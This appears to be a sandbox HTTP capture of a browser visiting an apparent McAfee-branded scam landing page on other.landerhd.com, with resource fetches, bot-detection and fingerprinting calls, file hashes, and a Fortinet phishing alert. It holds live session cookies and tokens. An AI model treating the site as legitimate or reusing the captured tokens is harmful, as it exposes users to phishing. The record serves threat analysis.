                                            GET /landingpages/mcafee/360.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 38110
last-modified: Wed, 31 Aug 2022 12:57:28 GMT
etag: "630f5ab8-94de"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 125 x 168, 8-bit/color RGBA, non-interlaced\012- data
Size:   38110
Md5:    15f432f9006e7256a9452bdd27835619
Sha1:   7042133d844e198542a7cc1fadcc513059130fe6
Sha256: 010ba660952072e4c859f26dd1f74bc21cc2d7bdbf7c37b90d9e3ed279ad500f
                                        
                                            GET /landingpages/mcafee/logo.png HTTP/1.1 
Host: other.landerhd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: image/png
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 30211
last-modified: Wed, 31 Aug 2022 12:57:28 GMT
etag: "630f5ab8-7603"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 1280 x 257, 8-bit/color RGBA, non-interlaced\012- data
Size:   30211
Md5:    26740ccd6ca2d5d3542f4b0d540bd30c
Sha1:   13c7ccbb771765399a7aeb351a9c8d79e668c480
Sha256: 9db2bed7f1778805e72f7f079f0b8789eaf039e3d9124145d2e88dab53e22ae2
                                        
POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1
Host: ocsp.globalsign.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Sep 2022 02:55:15 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "F44941A94EFB69688F9D98AA87B5FC757AE6BAC0"
Expires: Sat, 03 Sep 2022 14:00:00 GMT
Last-Modified: Sat, 03 Sep 2022 02:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 265
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 744b34974d260b69-OSL


--- Additional Info ---
Magic:  data
Size:   1462
Md5:    1e44fe5b89483e5daff984f8c320bfdd
Sha1:   4ed24dcc9f1a080d7493ae1aec94d301c0efa704
Sha256: 466b103965e99dbbac6220f0033cfa949775654842dbf9dc4a107a6db1ba5a1b
                                        
GET /releases/v5.7.2/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://use.fontawesome.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
172.67.169.247
HTTP/2 200 OK
content-type: font/woff2
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 74348
x-amz-id-2: 3/jdcpXI5+xJK7nwn8d2HdkJXJ8r1+io6huMQ4QXh7pg2id0g0n3j3YsvIgin01B5xYbhPbKRn0=
x-amz-request-id: JK0848QW7EBGRV95
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:46:18 GMT
etag: "462806316fea535a6a57651bc2b000b0"
cache-control: max-age=31556926
cf-cache-status: HIT
age: 24685
accept-ranges: bytes
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gh58UNA5Y7xOs1dFBeNXukZe6vedhnisNyI9HgTi47MEcPVZaHGxotL7zcjievHxHGPJdJsJ2NACibliMycHWj0W0g34RpcQYSuqxmcAIC%2BmU3fruEfbLrHUEgsQV6ELSnNL48cG"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 744b3497cbc71bfa-OSL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 74348, version 329.31064\012- data
Size:   74348
Md5:    462806316fea535a6a57651bc2b000b0
Sha1:   80644191098f863f25be27841c0d92c452cf2327
Sha256: 4f9ee3d8f6e621642979e6a8f7e75c57cb9da34918cc08a38abfe178dbae1dd2
                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 4295
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:43:40 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
GET /landingpages/mcafee/bg.jpg HTTP/1.1
Host: other.landerhd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: image/jpeg
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 129948
last-modified: Wed, 31 Aug 2022 12:57:35 GMT
etag: "630f5abf-1fb9c"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1800x613, components 3\012- data
Size:   129948
Md5:    444f46588f202bb38dceb8191f606f3e
Sha1:   f4eb55005df6be8068bb9c78d7fc0cd70651a1dc
Sha256: 86102483f8cb9a2d5bd4771914f960e1ea0bf6b1866aa1c2b86f75a1018b94ce
                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 4834
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:34:41 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 5550
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:22:45 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /gtm.js?id=GTM-TRL5HN2 HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
142.250.74.72
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Sat, 03 Sep 2022 02:55:15 GMT
expires: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, max-age=900
last-modified: Sat, 03 Sep 2022 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 46500
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3238)
Size:   46500
Md5:    fed66092a73699790c5a5c0ab8c61742
Sha1:   acc29b29757e94ae36f8ab603503afa7e9717819
Sha256: 6ee6f45b0a94e19952a0de0b8aa60c18e5697d359f913b30b6ac14bfac49f2e2
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 5550
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:22:45 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: jU7sEEBQFRShFzKuGuA+HA==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
34.214.110.180
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 12hLmOucVz5ytSREeOWeJCOxQJ0=

                                        
POST / HTTP/1.1
Host: ocsp.sca1b.amazontrust.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:15:14 GMT
Server: ECS (nyb/1D31)
X-Cache: Miss from cloudfront
Via: 1.1 b9f0050ca4d212d7c855e005be54b1ac.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: KBEzrHF4DvO4WScfkciH_BWwRDFuZRjUIoyx34el9Tg_RXp0h7ZcKg==
Age: 6001

                                        
POST /api/v1/detect?token=HtazsqGCe7nkVaIHchA&version=0.1.20 HTTP/1.1
Host: botd.fpapi.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://other.landerhd.com/
Content-Type: text/plain
Origin: https://other.landerhd.com
Content-Length: 21686
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
18.215.75.60
HTTP/2 200 OK
content-type: application/octet-stream
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 313
server: nginx
access-control-allow-credentials: true
access-control-allow-headers: Accept, Content-Type, Origin, Content-Length, Accept-Encoding, Authorization, Auth-Subscriptions, Botd-Password
access-control-allow-methods: POST, GET, OPTIONS
access-control-allow-origin: https://other.landerhd.com
x-amzn-trace-id: Root=1-6312c213-5c774eac55bec6ef5307dcf8
X-Firefox-Spdy: h2

                                        
GET /landingpages/mcafee/favicon.ico HTTP/1.1
Host: other.landerhd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/899637196
Cookie: XSRF-TOKEN=eyJpdiI6Ijg2NU96Qk9SSjE0NUlKR0piZWxpdnc9PSIsInZhbHVlIjoiMi9UUGkxTUZwQzRLQUI0WkRXQzFnd2hlN2tIaTVEMFVwOTFML09WaXJCVzRlRDljUVlYdXBJemt5eFJ4RUN5WG1RQWw0VmlmeElHbTdidkF2WVNzSnZxaFhSMGlTUU1PdTZpbDJXR1JqSTZqcjRQbG9ETEI0WXNwQUxtZVE3cDUiLCJtYWMiOiI3ODE3MTViZTgyMWRjYTc1M2IxZDQ0MjYyNzI4MzRiMDczZmI0MjYxZjA5OWRkZGFlMTFjYTkxMDIzNWFlNjQ0IiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6Ikpvb0VFZVNRSHNvNlJEUW1tcTREU0E9PSIsInZhbHVlIjoiVjl4MVIzMDFnQTQ0bUhuV2xkSVR0S25YZWdIbW9NVHZiWFpoM0REVFp6QnNlaFEyZEZyNHNtelZlbUpjOW05MmRmY3NwTFFGVldJblJmcnNLK01uK0lrcG9aVGRwUW54K2VtRUxIWldaVmNhTklPSlNZMi9FUHZaWmlqWitGMEwiLCJtYWMiOiJiYzM4NjhkOTUwY2RkYmM3NDgwM2Q5ZjBlOWY4YzEwN2MzOWViOWU2MWQwODAwOTUwZmM5ZWIzY2MwMGEwMzVmIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: image/x-icon
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
content-length: 1150
last-modified: Wed, 31 Aug 2022 12:57:35 GMT
etag: "630f5abf-47e"
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel\012- data
Size:   1150
Md5:    ff7441c3264d89023f376e5319dad793
Sha1:   1f0be835d947eb2de35d945ea5b9b92578a8cbd7
Sha256: 93130759a18703dcad5862bc2fd2973edf9ab7e48ba2c0b4cd4fcfaf832df223
                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 4446
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:41:09 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST /smartlink-css/6312c212994913464d155879?fingerprintid=9e4947f35751465411fd1a4f5c358c78 HTTP/1.1
Host: novidash.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Content-Length: 22284
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjAxdW9ZaTNTSDhLNmtsaGVzOXE2TUE9PSIsInZhbHVlIjoieFdYREhzU2tNQkpBK1NvM3JJTi9Oc1ZjamFBc28vSHhTc251YVU3c3A0Vy9yVWFseGduQUVEQ21HdmRDbGxJc3J6ekNWYTI1Q00rSWtnR1NyM1F0Vk5pQVA5V1N2SzZMTUpiYnduTHJURmJNZzZta3lpZkFlRWhuNG5neUlOUEYiLCJtYWMiOiJiZDg5ZWUwMzkzNDFjY2JjZjdiYzg1Yzk3ZDBjNDVhZWRkNjUwYmNjYTUwMWFjMTczMDRiMGQzMDBiODI0NjZmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IjlVL3ZJQzRSeEVSTlFsbGZuSkRSckE9PSIsInZhbHVlIjoibHFQRXlZY2h3UGpHY3ZqSnJuRUtYeXkwRzAvUW5oaWFPd1U1UitFQ2htRmMyckpYWTBWaGZLOW5aQTFnQ1JSYmlJTndPMHJjWUpodlpTZ20wcmhrUXZuaEdGRExXbmhMcTg3cW1DTXd6bWtXMFZ1Ny9BMmFMRzVycG51ZmVTWjUiLCJtYWMiOiJjYjE3OTRkZjUwMWRiZDg1Nzk0MjEzNDFjNWVkYzRhNTUzNTc4ZWMyYzE4ODg0OWYwYzNjNjU3OTZhZjVmNGVkIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  gzip compressed data, max compression\012- data
Size:   20006
Md5:    56f5d7f608e25d64207135f045f988cb
Sha1:   901eb59372ae330ae85e1384da93479b21ae1082
Sha256: 1910daea79e5a9d04829a91e432dfa56f45a80a3e14a8cf667fec73af9fd3d29

Alerts:
  Blocklists:
    - fortinet: Phishing
  File Analyzers:
    - virustotal: 0/56
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&uilel=3&hl=en&service=youtube HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S-1894852716%3A1662173715852221&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&hl=en&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmW9rJH5YUC-6E5LSVGZanyKywSleyyjxMdPTvnEgvYFigEtMJ6ab9qGOPpW7Ia20OUabu7L6w
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'nonce-cDX527YkZhdrzizJqkCnDA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 394
server: GSE
set-cookie: __Host-GAPS=1:nm96wdEXf2sB6jdgB9vjIHL1lHuf:dZNyZn2uDH9NspXw;Path=/;Expires=Mon, 02-Sep-2024 02:55:15 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (385)
Size:   394
Md5:    6654dd333e47e3fa1d5d1dec3e1cd619
Sha1:   9a088ff2921fe2fdc719d6e06cfee04a236ee05e
Sha256: 35bcddbc81f1ff5dae81431598ae724a2472e7e6aa029bd8e07415aa69203617
                                        
